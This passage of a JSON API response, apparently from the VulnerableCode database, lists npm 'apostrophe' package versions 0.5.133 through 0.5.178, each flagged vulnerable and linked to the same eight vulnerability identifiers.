:true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.133"},{"url":"http://public2.vulnerablecode.io/api/packages/268220?format=json","purl":"pkg:npm/apostrophe@0.5.134","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.134"},{"url":"http://public2.vulnerablecode.io/api/packages/268221?format=json","purl":"pkg:npm/apostrophe@0.5.135","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.135"},{"url":"http://public2.vulnerablecode.io/api/packages/268222?format=json","purl":"pkg:npm/apostrophe@0.5.136","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.136"},{"url":"http://public2.vulnerablecode.io/api/packages/268223?format=json","purl":"pkg:npm/apostrophe@0.5.137","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.137"},{"url":"http://public2.vulnerablecode.io/api/packages/268224?format=json","purl":"pkg:npm/apostrophe@0.5.138","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.138"},{"url":"http://public2.vulnerablecode.io/api/packages/268225?format=json","purl":"pkg:npm/apostrophe@0.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.139"},{"url":"http://public2.vulnerablecode.io/api/packages/268226?format=json","purl":"pkg:npm/apostrophe@0.5.140","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.140"},{"url":"http://public2.vulnerablecode.io/api/packages/268227?format=json","purl":"pkg:npm/apostrophe@0.5.141","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.141"},{"url":"http://public2.vulnerablecode.io/api/packages/268228?format=json","purl":"pkg:npm/apostrophe@0.5.142","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.142"},{"url":"http://public2.vulnerablecode.io/api/packages/268229?format=json","purl":"pkg:npm/apostrophe@0.5.143","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.143"},{"url":"http://public2.vulnerablecode.io/api/packages/268230?format=json","purl":"pkg:npm/apostrophe@0.5.144","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.144"},{"url":"http://public2.vulnerablecode.io/api/packages/268231?format=json","purl":"pkg:npm/apostrophe@0.5.145","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.145"},{"url":"http://public2.vulnerablecode.io/api/packages/268232?format=json","purl":"pkg:npm/apostrophe@0.5.146","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.146"},{"url":"http://public2.vulnerablecode.io/api/packages/268233?format=json","purl":"pkg:npm/apostrophe@0.5.147","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.147"},{"url":"http://public2.vulnerablecode.io/api/packages/268234?format=json","purl":"pkg:npm/apostrophe@0.5.148","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.148"},{"url":"http://public2.vulnerablecode.io/api/packages/268235?format=json","purl":"pkg:npm/apostrophe@0.5.149","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.149"},{"url":"http://public2.vulnerablecode.io/api/packages/268236?format=json","purl":"pkg:npm/apostrophe@0.5.150","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.150"},{"url":"http://public2.vulnerablecode.io/api/packages/268237?format=json","purl":"pkg:npm/apostrophe@0.5.151","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.151"},{"url":"http://public2.vulnerablecode.io/api/packages/268238?format=json","purl":"pkg:npm/apostrophe@0.5.152","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.152"},{"url":"http://public2.vulnerablecode.io/api/packages/268239?format=json","purl":"pkg:npm/apostrophe@0.5.153","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.153"},{"url":"http://public2.vulnerablecode.io/api/packages/268240?format=json","purl":"pkg:npm/apostrophe@0.5.155","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.155"},{"url":"http://public2.vulnerablecode.io/api/packages/268241?format=json","purl":"pkg:npm/apostrophe@0.5.156","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.156"},{"url":"http://public2.vulnerablecode.io/api/packages/268242?format=json","purl":"pkg:npm/apostrophe@0.5.157","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.157"},{"url":"http://public2.vulnerablecode.io/api/packages/268243?format=json","purl":"pkg:npm/apostrophe@0.5.158","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.158"},{"url":"http://public2.vulnerablecode.io/api/packages/268244?format=json","purl":"pkg:npm/apostrophe@0.5.159","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.159"},{"url":"http://public2.vulnerablecode.io/api/packages/268245?format=json","purl":"pkg:npm/apostrophe@0.5.160","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.160"},{"url":"http://public2.vulnerablecode.io/api/packages/268246?format=json","purl":"pkg:npm/apostrophe@0.5.161","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.161"},{"url":"http://public2.vulnerablecode.io/api/packages/268247?format=json","purl":"pkg:npm/apostrophe@0.5.162","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.162"},{"url":"http://public2.vulnerablecode.io/api/packages/268248?format=json","purl":"pkg:npm/apostrophe@0.5.163","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.163"},{"url":"http://public2.vulnerablecode.io/api/packages/268249?format=json","purl":"pkg:npm/apostrophe@0.5.164","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.164"},{"url":"http://public2.vulnerablecode.io/api/packages/268250?format=json","purl":"pkg:npm/apostrophe@0.5.165","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.165"},{"url":"http://public2.vulnerablecode.io/api/packages/268251?format=json","purl":"pkg:npm/apostrophe@0.5.166","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.166"},{"url":"http://public2.vulnerablecode.io/api/packages/268252?format=json","purl":"pkg:npm/apostrophe@0.5.167","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.167"},{"url":"http://public2.vulnerablecode.io/api/packages/268253?format=json","purl":"pkg:npm/apostrophe@0.5.168","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.168"},{"url":"http://public2.vulnerablecode.io/api/packages/268254?format=json","purl":"pkg:npm/apostrophe@0.5.169","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.169"},{"url":"http://public2.vulnerablecode.io/api/packages/268255?format=json","purl":"pkg:npm/apostrophe@0.5.170","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.170"},{"url":"http://public2.vulnerablecode.io/api/packages/268256?format=json","purl":"pkg:npm/apostrophe@0.5.171","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.171"},{"url":"http://public2.vulnerablecode.io/api/packages/268257?format=json","purl":"pkg:npm/apostrophe@0.5.172","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.172"},{"url":"http://public2.vulnerablecode.io/api/packages/268258?format=json","purl":"pkg:npm/apostrophe@0.5.174","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.174"},{"url":"http://public2.vulnerablecode.io/api/packages/268259?format=json","purl":"pkg:npm/apostrophe@0.5.175","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.175"},{"url":"http://public2.vulnerablecode.io/api/packages/268260?format=json","purl":"pkg:npm/apostrophe@0.5.176","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.176"},{"url":"http://public2.vulnerablecode.io/api/packages/268261?format=json","purl":"pkg:npm/apostrophe@0.5.177","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.177"},{"url":"http://public2.vulnerablecode.io/api/packages/268262?format=json","purl":"pkg:npm/apostrophe@0.5.178","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn